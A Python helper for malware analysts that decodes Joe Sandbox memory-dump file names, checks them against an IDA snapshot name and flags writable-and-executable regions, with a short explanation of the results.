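```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Windows page-protection constants from winnt.h (well-known values).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
WRITABLE = {0x04, 0x08, 0x40, 0x80}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}

# ASSUMED layout of a Joe Sandbox .sdmp name, inferred from the names in this
# report: <pid hex>.<phase hex>.<dump id>.<base hex>.<protect hex>.<f6>.<f7>.<f8>.sdmp
# Fields f6-f8 are not interpreted; their meaning is not stated on the page.
SDMP_NAME = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<f6>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)

# ASSUMED layout of the IDA snapshot name, from "hcaresult_14_2_400000_<uuid>.jbxd":
# hcaresult_<pid decimal>_<phase decimal>_<image base hex>_<uuid>.jbxd
SNAPSHOT_NAME = re.compile(r"^hcaresult_(?P<pid>\d+)_(?P<phase>\d+)_(?P<base>[0-9A-Fa-f]+)_")


@dataclass(frozen=True)
class SdmpName:
    pid: int
    phase: int
    dump_id: int
    base: int
    protect: int
    extra: Tuple[int, int, int]

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect, f"0x{self.protect:x}")

    @property
    def is_writable(self) -> bool:
        return self.protect in WRITABLE

    @property
    def is_executable(self) -> bool:
        return self.protect in EXECUTABLE


def parse_sdmp_name(name: str) -> SdmpName:
    """Split an .sdmp file name into its (assumed) fields."""
    m = SDMP_NAME.match(name)
    if not m:
        raise ValueError(f"not an .sdmp name in the assumed layout: {name}")
    return SdmpName(
        pid=int(m["pid"], 16),
        phase=int(m["phase"], 16),
        dump_id=int(m["dump_id"]),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        extra=(int(m["f6"], 16), int(m["f7"], 16), int(m["f8"], 16)),
    )


def rva(dump: SdmpName, image_base: int) -> Optional[int]:
    """Offset of the dump start from the PE image base, or None if it lies below it."""
    return dump.base - image_base if dump.base >= image_base else None


def snapshot_consistent(snapshot: str, dump: SdmpName, image_base: int) -> bool:
    """True when the IDA snapshot name names the same PID, phase and image base."""
    m = SNAPSHOT_NAME.match(snapshot)
    if not m:
        return False
    return (int(m["pid"]) == dump.pid
            and int(m["phase"]) == dump.phase
            and int(m["base"], 16) == image_base)


def wx_regions(names, image_base):
    """Dumps that are both writable and executable, as (base, RVA, protection)."""
    out = []
    for n in names:
        d = parse_sdmp_name(n)
        if d.is_writable and d.is_executable:
            out.append((hex(d.base), rva(d, image_base), d.protect_name))
    return out


# Constructed input: dump names taken from this report section.
IMAGE_BASE = 0x400000
DUMPS = [
    "0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp",
    "0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmp",
    "0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmp",
    "0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmp",
    "0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmp",
]
SNAPSHOT = "hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd"

if __name__ == "__main__":
    for n in DUMPS:
        d = parse_sdmp_name(n)
        print(f"pid={d.pid} phase={d.phase} base={d.base:#x} rva={rva(d, IMAGE_BASE):#x} {d.protect_name}")
    print("snapshot matches:", snapshot_consistent(SNAPSHOT, parse_sdmp_name(DUMPS[0]), IMAGE_BASE))
    print("W+X regions:", wx_regions(DUMPS, IMAGE_BASE))
```

The PID check is the useful sanity test: 0000000E is hex 14, which is the "14" in the snapshot name, so the IDA snapshot and the dumps belong to the same process and phase. The writable-and-executable filter flags the .text dump, which is exactly the region where code can be patched at run time and where a memory dump, rather than the file on disk, is the right thing to disassemble.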